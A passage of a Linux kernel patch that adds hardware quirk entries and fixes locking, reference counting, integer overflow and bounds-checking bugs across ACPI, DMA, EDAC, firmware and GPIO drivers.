+index 16dcd31d124fe..192d1784e409b 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -432,6 +432,13 @@ static const struct dmi_system_id asus_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "S5602ZA"),
+ 		},
+ 	},
++	{
++		.ident = "Asus ExpertBook B2402CBA",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_BOARD_NAME, "B2402CBA"),
++		},
++	},
+ 	{
+ 		.ident = "Asus ExpertBook B2502",
+ 		.matches = {
+diff --git a/drivers/acpi/sleep.c b/drivers/acpi/sleep.c
+index 0b557c0d405ef..4ca6672512722 100644
+--- a/drivers/acpi/sleep.c
++++ b/drivers/acpi/sleep.c
+@@ -60,13 +60,17 @@ static struct notifier_block tts_notifier = {
+ 	.priority	= 0,
+ };
+ 
++#ifndef acpi_skip_set_wakeup_address
++#define acpi_skip_set_wakeup_address() false
++#endif
++
+ static int acpi_sleep_prepare(u32 acpi_state)
+ {
+ #ifdef CONFIG_ACPI_SLEEP
+ 	unsigned long acpi_wakeup_address;
+ 
+ 	/* do we have a wakeup address for S2 and S3? */
+-	if (acpi_state == ACPI_STATE_S3) {
++	if (acpi_state == ACPI_STATE_S3 && !acpi_skip_set_wakeup_address()) {
+ 		acpi_wakeup_address = acpi_get_wakeup_address();
+ 		if (!acpi_wakeup_address)
+ 			return -EFAULT;
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 1db8e68cd8bce..5c32b318c173d 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -110,26 +110,6 @@ static bool nvidia_wmi_ec_supported(void)
+ }
+ #endif
+ 
+-static bool apple_gmux_backlight_present(void)
+-{
+-	struct acpi_device *adev;
+-	struct device *dev;
+-
+-	adev = acpi_dev_get_first_match_dev(GMUX_ACPI_HID, NULL, -1);
+-	if (!adev)
+-		return false;
+-
+-	dev = acpi_get_first_physical_node(adev);
+-	if (!dev)
+-		return false;
+-
+-	/*
+-	 * drivers/platform/x86/apple-gmux.c only supports old style
+-	 * Apple GMUX with an IO-resource.
+-	 */
+-	return pnp_get_resource(to_pnp_dev(dev), IORESOURCE_IO, 0) != NULL;
+-}
+-
+ /* Force to use vendor driver when the ACPI device is known to be
+  * buggy */
+ static int video_detect_force_vendor(const struct dmi_system_id *d)
+@@ -600,6 +580,14 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "GA503"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 /* Asus U46E */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK Computer Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "U46E"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_native,
+ 	 /* Asus UX303UB */
+@@ -608,6 +596,23 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "UX303UB"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 /* HP EliteBook 8460p */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Hewlett-Packard"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "HP EliteBook 8460p"),
++		},
++	},
++	{
++	 .callback = video_detect_force_native,
++	 /* HP Pavilion g6-1d80nr / B4U19UA */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Hewlett-Packard"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "HP Pavilion g6 Notebook PC"),
++		DMI_MATCH(DMI_PRODUCT_SKU, "B4U19UA"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_native,
+ 	 /* Samsung N150P */
+@@ -756,6 +761,7 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ {
+ 	static DEFINE_MUTEX(init_mutex);
+ 	static bool nvidia_wmi_ec_present;
++	static bool apple_gmux_present;
+ 	static bool native_available;
+ 	static bool init_done;
+ 	static long video_caps;
+@@ -769,6 +775,7 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 				    ACPI_UINT32_MAX, find_video, NULL,
+ 				    &video_caps, NULL);
+ 		nvidia_wmi_ec_present = nvidia_wmi_ec_supported();
++		apple_gmux_present = apple_gmux_detect(NULL, NULL);
+ 		init_done = true;
+ 	}
+ 	if (native)
+@@ -790,7 +797,7 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	if (nvidia_wmi_ec_present)
+ 		return acpi_backlight_nvidia_wmi_ec;
+ 
+-	if (apple_gmux_backlight_present())
++	if (apple_gmux_present)
+ 		return acpi_backlight_apple_gmux;
+ 
+ 	/* Use ACPI video if available, except when native should be preferred. */
+diff --git a/drivers/ata/Kconfig b/drivers/ata/Kconfig
+index 36833a8629980..d9b305a3427f7 100644
+--- a/drivers/ata/Kconfig
++++ b/drivers/ata/Kconfig
+@@ -650,6 +650,7 @@ config PATA_CS5530
+ config PATA_CS5535
+ 	tristate "CS5535 PATA support (Experimental)"
+ 	depends on PCI && (X86_32 || (X86_64 && COMPILE_TEST))
++	depends on !UML
+ 	help
+ 	  This option enables support for the NatSemi/AMD CS5535
+ 	  companion chip used with the Geode processor family.
+diff --git a/drivers/base/property.c b/drivers/base/property.c
+index 2a5a37fcd9987..7f338cb4fb7b8 100644
+--- a/drivers/base/property.c
++++ b/drivers/base/property.c
+@@ -989,26 +989,32 @@ struct fwnode_handle *
+ fwnode_graph_get_next_endpoint(const struct fwnode_handle *fwnode,
+ 			       struct fwnode_handle *prev)
+ {
++	struct fwnode_handle *ep, *port_parent = NULL;
+ 	const struct fwnode_handle *parent;
+-	struct fwnode_handle *ep;
+ 
+ 	/*
+ 	 * If this function is in a loop and the previous iteration returned
+ 	 * an endpoint from fwnode->secondary, then we need to use the secondary
+ 	 * as parent rather than @fwnode.
+ 	 */
+-	if (prev)
+-		parent = fwnode_graph_get_port_parent(prev);
+-	else
++	if (prev) {
++		port_parent = fwnode_graph_get_port_parent(prev);
++		parent = port_parent;
++	} else {
+ 		parent = fwnode;
++	}
+ 	if (IS_ERR_OR_NULL(parent))
+ 		return NULL;
+ 
+ 	ep = fwnode_call_ptr_op(parent, graph_get_next_endpoint, prev);
+ 	if (ep)
+-		return ep;
++		goto out_put_port_parent;
++
++	ep = fwnode_graph_get_next_endpoint(parent->secondary, NULL);
+ 
+-	return fwnode_graph_get_next_endpoint(parent->secondary, NULL);
++out_put_port_parent:
++	fwnode_handle_put(port_parent);
++	return ep;
+ }
+ EXPORT_SYMBOL_GPL(fwnode_graph_get_next_endpoint);
+ 
+diff --git a/drivers/base/test/test_async_driver_probe.c b/drivers/base/test/test_async_driver_probe.c
+index 4d1976ca50727..929410d0dd6fe 100644
+--- a/drivers/base/test/test_async_driver_probe.c
++++ b/drivers/base/test/test_async_driver_probe.c
+@@ -145,7 +145,7 @@ static int __init test_async_probe_init(void)
+ 	calltime = ktime_get();
+ 	for_each_online_cpu(cpu) {
+ 		nid = cpu_to_node(cpu);
+-		pdev = &sync_dev[sync_id];
++		pdev = &async_dev[async_id];
+ 
+ 		*pdev = test_platform_device_register_node("test_async_driver",
+ 							   async_id,
+diff --git a/drivers/block/rnbd/rnbd-clt.c b/drivers/block/rnbd/rnbd-clt.c
+index 78334da74d8bf..5eb8c7855970d 100644
+--- a/drivers/block/rnbd/rnbd-clt.c
++++ b/drivers/block/rnbd/rnbd-clt.c
+@@ -1440,7 +1440,7 @@ static struct rnbd_clt_dev *init_dev(struct rnbd_clt_session *sess,
+ 		goto out_alloc;
+ 	}
+ 
+-	ret = ida_alloc_max(&index_ida, 1 << (MINORBITS - RNBD_PART_BITS),
++	ret = ida_alloc_max(&index_ida, (1 << (MINORBITS - RNBD_PART_BITS)) - 1,
+ 			    GFP_KERNEL);
+ 	if (ret < 0) {
+ 		pr_err("Failed to initialize device '%s' from session %s, allocating idr failed, err: %d\n",
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 17b677b5d3b22..e546932046309 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -2092,13 +2092,12 @@ static void __exit ublk_exit(void)
+ 	struct ublk_device *ub;
+ 	int id;
+ 
+-	class_destroy(ublk_chr_class);
+-
+-	misc_deregister(&ublk_misc);
+-
+ 	idr_for_each_entry(&ublk_index_idr, ub, id)
+ 		ublk_remove(ub);
+ 
++	class_destroy(ublk_chr_class);
++	misc_deregister(&ublk_misc);
++
+ 	idr_destroy(&ublk_index_idr);
+ 	unregister_chrdev_region(ublk_chr_devt, UBLK_MINORS);
+ }
+diff --git a/drivers/cpufreq/armada-37xx-cpufreq.c b/drivers/cpufreq/armada-37xx-cpufreq.c
+index c10fc33b29b18..b74289a95a171 100644
+--- a/drivers/cpufreq/armada-37xx-cpufreq.c
++++ b/drivers/cpufreq/armada-37xx-cpufreq.c
+@@ -445,7 +445,7 @@ static int __init armada37xx_cpufreq_driver_init(void)
+ 		return -ENODEV;
+ 	}
+ 
+-	clk = clk_get(cpu_dev, 0);
++	clk = clk_get(cpu_dev, NULL);
+ 	if (IS_ERR(clk)) {
+ 		dev_err(cpu_dev, "Cannot get clock for CPU0\n");
+ 		return PTR_ERR(clk);
+diff --git a/drivers/cpufreq/cppc_cpufreq.c b/drivers/cpufreq/cppc_cpufreq.c
+index 432dfb4e8027e..022e3555407c8 100644
+--- a/drivers/cpufreq/cppc_cpufreq.c
++++ b/drivers/cpufreq/cppc_cpufreq.c
+@@ -487,7 +487,8 @@ static unsigned int get_perf_level_count(struct cpufreq_policy *policy)
+ 	cpu_data = policy->driver_data;
+ 	perf_caps = &cpu_data->perf_caps;
+ 	max_cap = arch_scale_cpu_capacity(cpu);
+-	min_cap = div_u64(max_cap * perf_caps->lowest_perf, perf_caps->highest_perf);
++	min_cap = div_u64((u64)max_cap * perf_caps->lowest_perf,
++			  perf_caps->highest_perf);
+ 	if ((min_cap == 0) || (max_cap < min_cap))
+ 		return 0;
+ 	return 1 + max_cap / CPPC_EM_CAP_STEP - min_cap / CPPC_EM_CAP_STEP;
+@@ -519,10 +520,10 @@ static int cppc_get_cpu_power(struct device *cpu_dev,
+ 	cpu_data = policy->driver_data;
+ 	perf_caps = &cpu_data->perf_caps;
+ 	max_cap = arch_scale_cpu_capacity(cpu_dev->id);
+-	min_cap = div_u64(max_cap * perf_caps->lowest_perf,
+-			perf_caps->highest_perf);
+-
+-	perf_step = CPPC_EM_CAP_STEP * perf_caps->highest_perf / max_cap;
++	min_cap = div_u64((u64)max_cap * perf_caps->lowest_perf,
++			  perf_caps->highest_perf);
++	perf_step = div_u64((u64)CPPC_EM_CAP_STEP * perf_caps->highest_perf,
++			    max_cap);
+ 	min_step = min_cap / CPPC_EM_CAP_STEP;
+ 	max_step = max_cap / CPPC_EM_CAP_STEP;
+ 
+diff --git a/drivers/cpufreq/cpufreq-dt-platdev.c b/drivers/cpufreq/cpufreq-dt-platdev.c
+index 6ac3800db4508..69a8742c0a7a3 100644
+--- a/drivers/cpufreq/cpufreq-dt-platdev.c
++++ b/drivers/cpufreq/cpufreq-dt-platdev.c
+@@ -135,6 +135,7 @@ static const struct of_device_id blocklist[] __initconst = {
+ 	{ .compatible = "nvidia,tegra30", },
+ 	{ .compatible = "nvidia,tegra124", },
+ 	{ .compatible = "nvidia,tegra210", },
++	{ .compatible = "nvidia,tegra234", },
+ 
+ 	{ .compatible = "qcom,apq8096", },
+ 	{ .compatible = "qcom,msm8996", },
+@@ -148,6 +149,7 @@ static const struct of_device_id blocklist[] __initconst = {
+ 	{ .compatible = "qcom,sdm845", },
+ 	{ .compatible = "qcom,sm6115", },
+ 	{ .compatible = "qcom,sm6350", },
++	{ .compatible = "qcom,sm6375", },
+ 	{ .compatible = "qcom,sm8150", },
+ 	{ .compatible = "qcom,sm8250", },
+ 	{ .compatible = "qcom,sm8350", },
+diff --git a/drivers/dma/dmaengine.c b/drivers/dma/dmaengine.c
+index c741b6431958c..8a6e6b60d66f3 100644
+--- a/drivers/dma/dmaengine.c
++++ b/drivers/dma/dmaengine.c
+@@ -451,7 +451,8 @@ static int dma_chan_get(struct dma_chan *chan)
+ 	/* The channel is already in use, update client count */
+ 	if (chan->client_count) {
+ 		__module_get(owner);
+-		goto out;
++		chan->client_count++;
++		return 0;
+ 	}
+ 
+ 	if (!try_module_get(owner))
+@@ -470,11 +471,11 @@ static int dma_chan_get(struct dma_chan *chan)
+ 			goto err_out;
+ 	}
+ 
++	chan->client_count++;
++
+ 	if (!dma_has_cap(DMA_PRIVATE, chan->device->cap_mask))
+ 		balance_ref_count(chan);
+ 
+-out:
+-	chan->client_count++;
+ 	return 0;
+ 
+ err_out:
+diff --git a/drivers/dma/ptdma/ptdma-dev.c b/drivers/dma/ptdma/ptdma-dev.c
+index 377da23012ac2..a2bf13ff18b6d 100644
+--- a/drivers/dma/ptdma/ptdma-dev.c
++++ b/drivers/dma/ptdma/ptdma-dev.c
+@@ -71,12 +71,13 @@ static int pt_core_execute_cmd(struct ptdma_desc *desc, struct pt_cmd_queue *cmd
+ 	bool soc = FIELD_GET(DWORD0_SOC, desc->dw0);
+ 	u8 *q_desc = (u8 *)&cmd_q->qbase[cmd_q->qidx];
+ 	u32 tail;
++	unsigned long flags;
+ 
+ 	if (soc) {
+ 		desc->dw0 |= FIELD_PREP(DWORD0_IOC, desc->dw0);
+ 		desc->dw0 &= ~DWORD0_SOC;
+ 	}
+-	mutex_lock(&cmd_q->q_mutex);
++	spin_lock_irqsave(&cmd_q->q_lock, flags);
+ 
+ 	/* Copy 32-byte command descriptor to hw queue. */
+ 	memcpy(q_desc, desc, 32);
+@@ -91,7 +92,7 @@ static int pt_core_execute_cmd(struct ptdma_desc *desc, struct pt_cmd_queue *cmd
+ 
+ 	/* Turn the queue back on using our cached control register */
+ 	pt_start_queue(cmd_q);
+-	mutex_unlock(&cmd_q->q_mutex);
++	spin_unlock_irqrestore(&cmd_q->q_lock, flags);
+ 
+ 	return 0;
+ }
+@@ -199,7 +200,7 @@ int pt_core_init(struct pt_device *pt)
+ 
+ 	cmd_q->pt = pt;
+ 	cmd_q->dma_pool = dma_pool;
+-	mutex_init(&cmd_q->q_mutex);
++	spin_lock_init(&cmd_q->q_lock);
+ 
+ 	/* Page alignment satisfies our needs for N <= 128 */
+ 	cmd_q->qsize = Q_SIZE(Q_DESC_SIZE);
+diff --git a/drivers/dma/ptdma/ptdma.h b/drivers/dma/ptdma/ptdma.h
+index d093c43b7d134..21b4bf895200b 100644
+--- a/drivers/dma/ptdma/ptdma.h
++++ b/drivers/dma/ptdma/ptdma.h
+@@ -196,7 +196,7 @@ struct pt_cmd_queue {
+ 	struct ptdma_desc *qbase;
+ 
+ 	/* Aligned queue start address (per requirement) */
+-	struct mutex q_mutex ____cacheline_aligned;
++	spinlock_t q_lock ____cacheline_aligned;
+ 	unsigned int qidx;
+ 
+ 	unsigned int qsize;
+diff --git a/drivers/dma/qcom/gpi.c b/drivers/dma/qcom/gpi.c
+index 3f56514bbef8f..98d45ee4b4e34 100644
+--- a/drivers/dma/qcom/gpi.c
++++ b/drivers/dma/qcom/gpi.c
+@@ -1756,6 +1756,7 @@ static int gpi_create_spi_tre(struct gchan *chan, struct gpi_desc *desc,
+ 		tre->dword[3] = u32_encode_bits(TRE_TYPE_GO, TRE_FLAGS_TYPE);
+ 		if (spi->cmd == SPI_RX) {
+ 			tre->dword[3] |= u32_encode_bits(1, TRE_FLAGS_IEOB);
++			tre->dword[3] |= u32_encode_bits(1, TRE_FLAGS_LINK);
+ 		} else if (spi->cmd == SPI_TX) {
+ 			tre->dword[3] |= u32_encode_bits(1, TRE_FLAGS_CHAIN);
+ 		} else { /* SPI_DUPLEX */
+diff --git a/drivers/dma/tegra186-gpc-dma.c b/drivers/dma/tegra186-gpc-dma.c
+index fa9bda4a2bc6f..75af3488a3baf 100644
+--- a/drivers/dma/tegra186-gpc-dma.c
++++ b/drivers/dma/tegra186-gpc-dma.c
+@@ -707,6 +707,7 @@ static int tegra_dma_terminate_all(struct dma_chan *dc)
+ 			return err;
+ 		}
+ 
++		vchan_terminate_vdesc(&tdc->dma_desc->vd);
+ 		tegra_dma_disable(tdc);
+ 		tdc->dma_desc = NULL;
+ 	}
+diff --git a/drivers/dma/ti/k3-udma.c b/drivers/dma/ti/k3-udma.c
+index 7b5081989b3d6..b86b809eb1f7e 100644
+--- a/drivers/dma/ti/k3-udma.c
++++ b/drivers/dma/ti/k3-udma.c
+@@ -761,11 +761,12 @@ static void udma_decrement_byte_counters(struct udma_chan *uc, u32 val)
+ 	if (uc->desc->dir == DMA_DEV_TO_MEM) {
+ 		udma_rchanrt_write(uc, UDMA_CHAN_RT_BCNT_REG, val);
+ 		udma_rchanrt_write(uc, UDMA_CHAN_RT_SBCNT_REG, val);
+-		udma_rchanrt_write(uc, UDMA_CHAN_RT_PEER_BCNT_REG, val);
++		if (uc->config.ep_type != PSIL_EP_NATIVE)
++			udma_rchanrt_write(uc, UDMA_CHAN_RT_PEER_BCNT_REG, val);
+ 	} else {
+ 		udma_tchanrt_write(uc, UDMA_CHAN_RT_BCNT_REG, val);
+ 		udma_tchanrt_write(uc, UDMA_CHAN_RT_SBCNT_REG, val);
+-		if (!uc->bchan)
++		if (!uc->bchan && uc->config.ep_type != PSIL_EP_NATIVE)
+ 			udma_tchanrt_write(uc, UDMA_CHAN_RT_PEER_BCNT_REG, val);
+ 	}
+ }
+diff --git a/drivers/dma/xilinx/xilinx_dma.c b/drivers/dma/xilinx/xilinx_dma.c
+index 8cd4e69dc7b4c..7660175704883 100644
+--- a/drivers/dma/xilinx/xilinx_dma.c
++++ b/drivers/dma/xilinx/xilinx_dma.c
+@@ -3141,8 +3141,10 @@ static int xilinx_dma_probe(struct platform_device *pdev)
+ 	/* Initialize the channels */
+ 	for_each_child_of_node(node, child) {
+ 		err = xilinx_dma_child_probe(xdev, child);
+-		if (err < 0)
++		if (err < 0) {
++			of_node_put(child);
+ 			goto error;
++		}
+ 	}
+ 
+ 	if (xdev->dma_config->dmatype == XDMA_TYPE_VDMA) {
+diff --git a/drivers/edac/edac_device.c b/drivers/edac/edac_device.c
+index 878deb4880cdb..0689e15107213 100644
+--- a/drivers/edac/edac_device.c
++++ b/drivers/edac/edac_device.c
+@@ -34,6 +34,9 @@
+ static DEFINE_MUTEX(device_ctls_mutex);
+ static LIST_HEAD(edac_device_list);
+ 
++/* Default workqueue processing interval on this instance, in msecs */
++#define DEFAULT_POLL_INTERVAL 1000
++
+ #ifdef CONFIG_EDAC_DEBUG
+ static void edac_device_dump_device(struct edac_device_ctl_info *edac_dev)
+ {
+@@ -336,7 +339,7 @@ static void edac_device_workq_function(struct work_struct *work_req)
+ 	 * whole one second to save timers firing all over the period
+ 	 * between integral seconds
+ 	 */
+-	if (edac_dev->poll_msec == 1000)
++	if (edac_dev->poll_msec == DEFAULT_POLL_INTERVAL)
+ 		edac_queue_work(&edac_dev->work, round_jiffies_relative(edac_dev->delay));
+ 	else
+ 		edac_queue_work(&edac_dev->work, edac_dev->delay);
+@@ -366,7 +369,7 @@ static void edac_device_workq_setup(struct edac_device_ctl_info *edac_dev,
+ 	 * timers firing on sub-second basis, while they are happy
+ 	 * to fire together on the 1 second exactly
+ 	 */
+-	if (edac_dev->poll_msec == 1000)
++	if (edac_dev->poll_msec == DEFAULT_POLL_INTERVAL)
+ 		edac_queue_work(&edac_dev->work, round_jiffies_relative(edac_dev->delay));
+ 	else
+ 		edac_queue_work(&edac_dev->work, edac_dev->delay);
+@@ -400,7 +403,7 @@ void edac_device_reset_delay_period(struct edac_device_ctl_info *edac_dev,
+ 	edac_dev->delay	    = msecs_to_jiffies(msec);
+ 
+ 	/* See comment in edac_device_workq_setup() above */
+-	if (edac_dev->poll_msec == 1000)
++	if (edac_dev->poll_msec == DEFAULT_POLL_INTERVAL)
+ 		edac_mod_work(&edac_dev->work, round_jiffies_relative(edac_dev->delay));
+ 	else
+ 		edac_mod_work(&edac_dev->work, edac_dev->delay);
+@@ -442,11 +445,7 @@ int edac_device_add_device(struct edac_device_ctl_info *edac_dev)
+ 		/* This instance is NOW RUNNING */
+ 		edac_dev->op_state = OP_RUNNING_POLL;
+ 
+-		/*
+-		 * enable workq processing on this instance,
+-		 * default = 1000 msec
+-		 */
+-		edac_device_workq_setup(edac_dev, 1000);
++		edac_device_workq_setup(edac_dev, edac_dev->poll_msec ?: DEFAULT_POLL_INTERVAL);
+ 	} else {
+ 		edac_dev->op_state = OP_RUNNING_INTERRUPT;
+ 	}
+diff --git a/drivers/edac/highbank_mc_edac.c b/drivers/edac/highbank_mc_edac.c
+index 61b76ec226af1..19fba258ae108 100644
+--- a/drivers/edac/highbank_mc_edac.c
++++ b/drivers/edac/highbank_mc_edac.c
+@@ -174,8 +174,10 @@ static int highbank_mc_probe(struct platform_device *pdev)
+ 	drvdata = mci->pvt_info;
+ 	platform_set_drvdata(pdev, mci);
+ 
+-	if (!devres_open_group(&pdev->dev, NULL, GFP_KERNEL))
+-		return -ENOMEM;
++	if (!devres_open_group(&pdev->dev, NULL, GFP_KERNEL)) {
++		res = -ENOMEM;
++		goto free;
++	}
+ 
+ 	r = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+ 	if (!r) {
+@@ -243,6 +245,7 @@ err2:
+ 	edac_mc_del_mc(&pdev->dev);
+ err:
+ 	devres_release_group(&pdev->dev, NULL);
++free:
+ 	edac_mc_free(mci);
+ 	return res;
+ }
+diff --git a/drivers/edac/qcom_edac.c b/drivers/edac/qcom_edac.c
+index 97a27e42dd610..c45519f59dc11 100644
+--- a/drivers/edac/qcom_edac.c
++++ b/drivers/edac/qcom_edac.c
+@@ -252,7 +252,7 @@ clear:
+ static int
+ dump_syn_reg(struct edac_device_ctl_info *edev_ctl, int err_type, u32 bank)
+ {
+-	struct llcc_drv_data *drv = edev_ctl->pvt_info;
++	struct llcc_drv_data *drv = edev_ctl->dev->platform_data;
+ 	int ret;
+ 
+ 	ret = dump_syn_reg_values(drv, bank, err_type);
+@@ -289,7 +289,7 @@ static irqreturn_t
+ llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ {
+ 	struct edac_device_ctl_info *edac_dev_ctl = edev_ctl;
+-	struct llcc_drv_data *drv = edac_dev_ctl->pvt_info;
++	struct llcc_drv_data *drv = edac_dev_ctl->dev->platform_data;
+ 	irqreturn_t irq_rc = IRQ_NONE;
+ 	u32 drp_error, trp_error, i;
+ 	int ret;
+@@ -358,7 +358,6 @@ static int qcom_llcc_edac_probe(struct platform_device *pdev)
+ 	edev_ctl->dev_name = dev_name(dev);
+ 	edev_ctl->ctl_name = "llcc";
+ 	edev_ctl->panic_on_ue = LLCC_ERP_PANIC_ON_UE;
+-	edev_ctl->pvt_info = llcc_driv_data;
+ 
+ 	rc = edac_device_add_device(edev_ctl);
+ 	if (rc)
+diff --git a/drivers/firmware/arm_scmi/shmem.c b/drivers/firmware/arm_scmi/shmem.c
+index 1dfe534b85184..87b4f4d35f062 100644
+--- a/drivers/firmware/arm_scmi/shmem.c
++++ b/drivers/firmware/arm_scmi/shmem.c
+@@ -81,10 +81,11 @@ u32 shmem_read_header(struct scmi_shared_mem __iomem *shmem)
+ void shmem_fetch_response(struct scmi_shared_mem __iomem *shmem,
+ 			  struct scmi_xfer *xfer)
+ {
++	size_t len = ioread32(&shmem->length);
++
+ 	xfer->hdr.status = ioread32(shmem->msg_payload);
+ 	/* Skip the length of header and status in shmem area i.e 8 bytes */
+-	xfer->rx.len = min_t(size_t, xfer->rx.len,
+-			     ioread32(&shmem->length) - 8);
++	xfer->rx.len = min_t(size_t, xfer->rx.len, len > 8 ? len - 8 : 0);
+ 
+ 	/* Take a copy to the rx buffer.. */
+ 	memcpy_fromio(xfer->rx.buf, shmem->msg_payload + 4, xfer->rx.len);
+@@ -93,8 +94,10 @@ void shmem_fetch_response(struct scmi_shared_mem __iomem *shmem,
+ void shmem_fetch_notification(struct scmi_shared_mem __iomem *shmem,
+ 			      size_t max_len, struct scmi_xfer *xfer)
+ {
++	size_t len = ioread32(&shmem->length);
++
+ 	/* Skip only the length of header in shmem area i.e 4 bytes */
+-	xfer->rx.len = min_t(size_t, max_len, ioread32(&shmem->length) - 4);
++	xfer->rx.len = min_t(size_t, max_len, len > 4 ? len - 4 : 0);
+ 
+ 	/* Take a copy to the rx buffer.. */
+ 	memcpy_fromio(xfer->rx.buf, shmem->msg_payload, xfer->rx.len);
+diff --git a/drivers/firmware/arm_scmi/virtio.c b/drivers/firmware/arm_scmi/virtio.c
+index 33c9b81a55cd1..1db975c088969 100644
+--- a/drivers/firmware/arm_scmi/virtio.c
++++ b/drivers/firmware/arm_scmi/virtio.c
+@@ -160,7 +160,6 @@ static void scmi_vio_channel_cleanup_sync(struct scmi_vio_channel *vioch)
+ 	}
+ 
+ 	vioch->shutdown_done = &vioch_shutdown_done;
+-	virtio_break_device(vioch->vqueue->vdev);
+ 	if (!vioch->is_rx && vioch->deferred_tx_wq)
+ 		/* Cannot be kicked anymore after this...*/
+ 		vioch->deferred_tx_wq = NULL;
+@@ -482,6 +481,12 @@ static int virtio_chan_free(int id, void *p, void *data)
+ 	struct scmi_chan_info *cinfo = p;
+ 	struct scmi_vio_channel *vioch = cinfo->transport_info;
+ 
++	/*
++	 * Break device to inhibit further traffic flowing while shutting down
++	 * the channels: doing it later holding vioch->lock creates unsafe
++	 * locking dependency chains as reported by LOCKDEP.
++	 */
++	virtio_break_device(vioch->vqueue->vdev);
+ 	scmi_vio_channel_cleanup_sync(vioch);
+ 
+ 	scmi_free_channel(cinfo, data, id);
+diff --git a/drivers/firmware/efi/runtime-wrappers.c b/drivers/firmware/efi/runtime-wrappers.c
+index 60075e0e4943a..1fba4e09cdcff 100644
+--- a/drivers/firmware/efi/runtime-wrappers.c
++++ b/drivers/firmware/efi/runtime-wrappers.c
+@@ -84,6 +84,7 @@ struct efi_runtime_work efi_rts_work;
+ 	else								\
+ 		pr_err("Failed to queue work to efi_rts_wq.\n");	\
+ 									\
++	WARN_ON_ONCE(efi_rts_work.status == EFI_ABORTED);		\
+ exit:									\
+ 	efi_rts_work.efi_rts_id = EFI_NONE;				\
+ 	efi_rts_work.status;						\
+diff --git a/drivers/firmware/google/coreboot_table.c b/drivers/firmware/google/coreboot_table.c
+index 9ca21feb9d454..f3694d3478019 100644
+--- a/drivers/firmware/google/coreboot_table.c
++++ b/drivers/firmware/google/coreboot_table.c
+@@ -93,7 +93,12 @@ static int coreboot_table_populate(struct device *dev, void *ptr)
+ 	for (i = 0; i < header->table_entries; i++) {
+ 		entry = ptr_entry;
+ 
+-		device = kzalloc(sizeof(struct device) + entry->size, GFP_KERNEL);
++		if (entry->size < sizeof(*entry)) {
++			dev_warn(dev, "coreboot table entry too small!\n");
++			return -EINVAL;
++		}
++
++		device = kzalloc(sizeof(device->dev) + entry->size, GFP_KERNEL);
+ 		if (!device)
+ 			return -ENOMEM;
+ 
+@@ -101,7 +106,7 @@ static int coreboot_table_populate(struct device *dev, void *ptr)
+ 		device->dev.parent = dev;
+ 		device->dev.bus = &coreboot_bus_type;
+ 		device->dev.release = coreboot_device_release;
+-		memcpy(&device->entry, ptr_entry, entry->size);
++		memcpy(device->raw, ptr_entry, entry->size);
+ 
+ 		ret = device_register(&device->dev);
+ 		if (ret) {
+diff --git a/drivers/firmware/google/coreboot_table.h b/drivers/firmware/google/coreboot_table.h
+index beb778674acdc..4a89277b99a39 100644
+--- a/drivers/firmware/google/coreboot_table.h
++++ b/drivers/firmware/google/coreboot_table.h
+@@ -66,6 +66,7 @@ struct coreboot_device {
+ 		struct coreboot_table_entry entry;
+ 		struct lb_cbmem_ref cbmem_ref;
+ 		struct lb_framebuffer framebuffer;
++		DECLARE_FLEX_ARRAY(u8, raw);
+ 	};
+ };
+ 
+diff --git a/drivers/gpio/gpio-ep93xx.c b/drivers/gpio/gpio-ep93xx.c
+index 2e17797091133..7edcdc5750802 100644
+--- a/drivers/gpio/gpio-ep93xx.c
++++ b/drivers/gpio/gpio-ep93xx.c
+@@ -148,7 +148,7 @@ static void ep93xx_gpio_f_irq_handler(struct irq_desc *desc)
+ 	 */
+ 	struct irq_chip *irqchip = irq_desc_get_chip(desc);
+ 	unsigned int irq = irq_desc_get_irq(desc);
+-	int port_f_idx = ((irq + 1) & 7) ^ 4; /* {19..22,47..50} -> {0..7} */
++	int port_f_idx = (irq & 7) ^ 4; /* {20..23,48..51} -> {0..7} */
+ 	int gpio_irq = EP93XX_GPIO_F_IRQ_BASE + port_f_idx;
+ 
+ 	chained_irq_enter(irqchip, desc);
+diff --git a/drivers/gpio/gpio-mxc.c b/drivers/gpio/gpio-mxc.c
+index c871602fc5ba9..853d9aa6b3b1f 100644
+--- a/drivers/gpio/gpio-mxc.c
++++ b/drivers/gpio/gpio-mxc.c
+@@ -18,6 +18,7 @@
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include <linux/slab.h>
++#include <linux/spinlock.h>
+ #include <linux/syscore_ops.h>
+ #include <linux/gpio/driver.h>
+ #include <linux/of.h>
+@@ -147,6 +148,7 @@ static int gpio_set_irq_type(struct irq_data *d, u32 type)
+ {
+ 	struct irq_chip_generic *gc = irq_data_get_irq_chip_data(d);
+ 	struct mxc_gpio_port *port = gc->private;
++	unsigned long flags;
+ 	u32 bit, val;
+ 	u32 gpio_idx = d->hwirq;
+ 	int edge;
+@@ -185,6 +187,8 @@ static int gpio_set_irq_type(struct irq_data *d, u32 type)
+ 		return -EINVAL;
+ 	}
+ 
